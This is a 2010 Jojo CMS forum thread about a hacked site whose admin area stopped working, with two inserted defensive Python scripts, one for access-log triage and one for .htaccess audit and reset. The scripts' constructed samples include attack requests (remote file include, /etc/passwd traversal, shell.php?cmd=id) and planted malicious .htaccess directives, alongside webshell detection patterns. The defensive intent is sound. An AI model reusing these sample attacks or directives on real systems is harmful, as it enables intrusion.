OOOOPS !!! lost access to admin...


glouk
19 Oct 2010, Posts: 46

Hi,
My Jojo site was hacked some time ago; it seemed it had a security issue. I managed to fix the front part, but did not realize at that time that I had lost access to the admin: when I go to http://demo.glouk.org/admin, I get a page with my standard front header and nothing in it...
It's RC1. I tried upgrading to 1.0 stable but it's worse: I only get blank pages.
I ran setup many times; it did nothing...
Any insight? I'm somewhat lost here, and of course I have quite an urgent need to add content to my demo site.
Thanks.

glouk
mikec (Lead Developer)
19 Oct 2010, Posts: 67

Open up phpMyAdmin (or whatever other tool you use for managing your database tables) and delete the rows from the page table that relate to the admin area.

Then run setup and it will re-add these and you should be able to log in again.

How was the site hacked? Was it the whole server that was hacked or just the Jojo site? Have you got the access logs from the time it was hacked that we could look at to investigate any possible security issue with Jojo?

- Mike
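Mike asks for the access logs from the time of the compromise. The script below is an added example for that step, not part of Jojo CMS or of this thread: it parses Apache/nginx "combined" format lines and flags request patterns that commonly accompany a PHP site compromise (a URL or stream wrapper passed in a query parameter, directory traversal, a PHP script requested outside the front controller, webshell-like file names, write requests to the admin area), then counts flagged requests per client address so the noisiest sources stand out. The rules are heuristics, the URL layout (/index.php front controller, /admin area) is assumed, and the log lines in SAMPLE_LOG are constructed for the example; treat hits as leads to read by hand, not proof.

```python
"""Triage Apache/nginx "combined" access log lines for a compromised PHP site.
Added example for this thread; not part of Jojo CMS. The rules below are
heuristics (leads to review by hand), the URL layout (/index.php front
controller, /admin area) is assumed, and SAMPLE_LOG is constructed."""
import re
import sys
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match.
    'decoded' is the percent-decoded request path so encoded ../ is caught too."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["decoded"] = unquote(entry["path"])
    return entry

# (label, predicate) pairs; each one is a heuristic, not proof of compromise.
RULES = [
    ("URL or stream wrapper passed in a query parameter (remote-include attempt)",
     lambda e: re.search(r'[?&][^=&]*=(https?|ftp|php|data|expect):', e["decoded"], re.I)),
    ("directory traversal in request path",
     lambda e: "../" in e["decoded"] or "..\\" in e["decoded"]),
    ("PHP script requested outside the /index.php front controller",
     lambda e: re.search(r'\.ph(p\d?|tml)(\?|$)', e["decoded"], re.I)
     and not e["decoded"].startswith("/index.php")),
    ("webshell-like file name",
     lambda e: re.search(r'(shell|c99|r57|cmd|wso)[^/]*\.(php|txt)', e["decoded"], re.I)),
    ("write method against the admin area (compare against legitimate logins)",
     lambda e: e["method"] in ("POST", "PUT") and e["decoded"].startswith("/admin")),
]

def triage(lines):
    """Return (hits, per_ip): hits is a list of (label, entry) for every rule that
    matched a parsed line; per_ip counts flagged requests by client address."""
    hits = []
    per_ip = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        matched = [label for label, pred in RULES if pred(entry)]
        hits.extend((label, entry) for label in matched)
        if matched:
            per_ip[entry["ip"]] += 1
    return hits, per_ip

# Constructed sample lines; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '192.0.2.1 - - [10/Oct/2010:13:55:36 +0200] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.1 - - [10/Oct/2010:13:55:37 +0200] "GET /css/styles.css HTTP/1.1" 200 812 "http://demo.example/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2010:14:02:11 +0200] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Oct/2010:14:02:14 +0200] "GET /images/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 209 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Oct/2010:14:03:40 +0200] "GET /images/shell.php?cmd=id HTTP/1.1" 200 44 "-" "Mozilla/4.0"',
    '198.51.100.5 - - [10/Oct/2010:14:10:02 +0200] "POST /admin/ HTTP/1.1" 302 0 "http://demo.example/admin/" "Mozilla/5.0"',
]

def report(hits, per_ip, out=sys.stdout):
    """Print one line per hit, then the per-address totals."""
    for label, e in hits:
        print(f'{e["ip"]:>15} {e["time"]} {e["method"]} {e["path"]} -> {e["status"]}  [{label}]', file=out)
    print("flagged requests per address:", dict(per_ip.most_common()), file=out)

if __name__ == "__main__":
    # Pipe a real log in (python3 triage.py < access.log) or run with no input for the sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG
    report(*triage(source))
```

On the sample, the three requests from 203.0.113.7 are flagged (remote include, traversal, and a shell.php that trips two rules), and the POST to /admin/ is flagged once for review. On a real log, check the flagged addresses against the admin's own logins and the timestamps against when the front site first changed, and remember that a 200 on a shell-like path means the file was there and answered.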
Rick
19 Oct 2010, Posts: 336

The blank pages could be Dwoo falling over on some old smarty code. Any idea how it was hacked?
Rick
19 Oct 2010, Posts: 336

Sorry for the above posts... I was on my old mobile and it gave a redirection limit error... I guess it kept posting instead of moving on to the following page.

[admin: repeated posts removed]
glouk
19 Oct 2010, Posts: 46

About the hacking method: I do not remember exactly, but it was Jojo-specific :(. I did not memorize it; it had something to do with PHP.

I'm sorry I did not post about it here, but I was so pissed off that I threw everything away.

As for the repair: I'll try it and come back to you.

Thanks

PS: I just understood about Dwoo... 1.0 has left Smarty behind? Does that mean I have to rewrite all the Smarty code?
glouk
20 Oct 2010, Posts: 46

Rick,

I followed your instructions, deleted the rows and they were recreated by setup, but still the same problem: http://demo.glouk.org/admin leads to a page with my front theme and no content... I attach a screen capture...

I created a new clean install with Jojo 1.0, and I get white pages when I install my plugin and theme.

I wonder if this has to do with mod_rewrite? That would explain why the front theme is applied when I load http://demo.glouk.org/admin

Maybe I messed up rewrite rules... or there remains a trace of the hacker...

If you have an idea here, I would be grateful, since I have an urgent need to update my website.

Thanks
Rick
20 Oct 2010, Posts: 336

The front theme will be applied to /admin/ if you're not logged in... It shows the login form within your website's theme. That may be what's happening there.

When you upgraded to 1.0, did the templating engine get automatically set to Dwoo? Usually a completely blank screen means that Dwoo couldn't run some code that was intended for Smarty. Eg section tags.

My initial thought was that you'd overridden the login template with a blank one... but I just tried loading your demo site and none of the asset files (images, css, javascript etc) are loading.

/ - loads
/index.php - redirects to /
/index.html - fails
/admin/ - loads (empty content area)
/css/styles.css - fails
/js/common.js - fails
/images/logo.jpg - fails
/images/newheader.gif - fails
/admin/edit/ - fails
/favicon.ico - loads

It almost looks like the whole site has been stripped back to two html files (/index.php and /admin/<something>).

I'd suggest fixing your htaccess file. To do this you simply need to make sure the directory has appropriate permissions, delete the file and load up your website. Jojo will recreate the file for you. See what that fixes. I hope this helps, keep us posted.

Also, does your template have stylesheet includes at the top? I see lines for stylesheets named header/home/films/film/plan etc. If you really want these to be separate files instead of combined into styles.css then you can add the rows in a customhead.tpl file in your theme's template folder. That will put them inside the head tags.

If you remember how the site was compromised, you might want to let the main devs know via the contact form rather than posting here :)
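Rick's advice above is to delete .htaccess and let Jojo write a fresh one. The script below is an added example, not Jojo's own code or Rick's, that does the same step a little more carefully for a site that was compromised: it checks the web root is writable so the regeneration can happen, audits the existing file for directives attackers commonly plant (auto_prepend_file, handler mappings that make non-.php files execute as PHP, rewrites and error pages that send visitors to another host), and moves the file aside under a timestamped name instead of deleting it, so it can still be examined. The directive list is a heuristic, the .htaccess content written by demo_run() is constructed, and the writability check is made for the user running the script, so run it as the web server user or verify that account separately.

```python
"""Audit, back up and reset a web root's .htaccess so Jojo can regenerate it.
Added example for this thread; not part of Jojo CMS. SUSPICIOUS_DIRECTIVES
is a heuristic list of things attackers commonly plant in .htaccess, and
the file written by demo_run() is constructed for the example."""
import os
import re
import shutil
import tempfile
import time
from pathlib import Path

SUSPICIOUS_DIRECTIVES = [
    (r'^\s*php_(value|flag)\s+auto_(prepend|append)_file\b',
     "auto_prepend/append_file pulls attacker code into every PHP request"),
    (r'^\s*AddHandler\s+\S*php',
     "AddHandler makes extra extensions execute as PHP"),
    (r'^\s*AddType\s+application/x-httpd-php',
     "AddType makes non-.php files execute as PHP"),
    (r'^\s*RewriteRule\s+\S+\s+https?://',
     "RewriteRule sends visitors to another host"),
    (r'^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}',
     "conditional rewrite on user agent or referer (classic cloaked redirect)"),
    (r'^\s*ErrorDocument\s+\d+\s+https?://',
     "ErrorDocument pointing off-site"),
    (r'^\s*(Options\b.*ExecCGI|SetHandler\s+cgi-script|AddHandler\s+cgi-script)',
     "CGI execution enabled"),
]

def audit_htaccess(path):
    """Return a list of (line_no, reason, line) for directives worth a look."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            for pattern, reason in SUSPICIOUS_DIRECTIVES:
                if re.search(pattern, line, re.I):
                    findings.append((no, reason, line.rstrip("\n")))
    return findings

def reset_htaccess(webroot):
    """Move webroot/.htaccess to a timestamped backup and return the backup path
    (None if no file existed). Raises if the directory is not writable, because
    then Jojo could not recreate the file either. os.access() tests the current
    user, so run as the web server account or check that account separately."""
    root = Path(webroot)
    if not root.is_dir():
        raise NotADirectoryError(webroot)
    if not os.access(root, os.W_OK):
        raise PermissionError(f"{webroot} is not writable; Jojo cannot recreate .htaccess")
    ht = root / ".htaccess"
    if not ht.exists():
        return None
    backup = root / f".htaccess.bak.{time.strftime('%Y%m%d-%H%M%S')}"
    shutil.move(str(ht), str(backup))
    return backup

def demo_run():
    """Build a throwaway web root with a constructed .htaccess (three ordinary
    rewrite lines plus two planted ones), audit it, then move it aside."""
    root = tempfile.mkdtemp(prefix="jojo-webroot-")
    sample = "\n".join([
        "RewriteEngine On",
        "RewriteCond %{REQUEST_FILENAME} !-f",
        "RewriteRule ^(.*)$ index.php [QSA,L]",
        "php_value auto_prepend_file /tmp/.cache/x.php",
        "RewriteRule ^(.*)$ http://203.0.113.9/$1 [R,L]",
    ]) + "\n"
    ht = os.path.join(root, ".htaccess")
    with open(ht, "w") as fh:
        fh.write(sample)
    findings = audit_htaccess(ht)
    backup = reset_htaccess(root)
    return {
        "findings": findings,
        "backup": backup,
        "remaining": os.path.exists(ht),
        "second": reset_htaccess(root),  # nothing left to move: None
    }

if __name__ == "__main__":
    result = demo_run()
    for no, reason, line in result["findings"]:
        print(f"line {no}: {reason}\n    {line}")
    print("moved to", result["backup"])
```

On the real site, call audit_htaccess on the live file first and read the findings, then reset_htaccess on the web root, then load the front page so Jojo writes a new file; diff the new file against the backup before deleting the backup.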
mikec (Lead Developer)
20 Oct 2010, Posts: 67

Rick said...
> If you remember how the site was compromised, you might want to let the main devs know via the contact form rather than posting here :)

Where's the fun in that :-)

I'm guessing that, because the rest of us aren't seeing our few hundred sites being compromised, there isn't a known (in the hacker community) vulnerability in Jojo. There could have been/be security issues in one or more of the externals that we are not aware of.
glouk
20 Oct 2010, Posts: 46

Well, it seems I have lost everything but my data here.

I've managed to access administration by reinstalling RC1 and deactivating my theme in phpMyAdmin, but:

- all the specifics of my plugin, and especially administration pages, have disappeared in the process (maybe the setup?)

- the front is not working anymore; I get this message:
"Your Jojo theme doesn't have a template.tpl file. It needs this to work.
For more information, you may want to try the Jojo documentation."
(of course this is not true)

- when I reactivate my theme it is automatically also applied to the admin, and everything disappears.

Which means everything has to be rebuilt from scratch... I guess

unless someone has a way out of this...
Rick
25 Oct 2010, Posts: 336

Is there a chance that there's something rather wonky in your plugin or theme that's playing havoc with everything?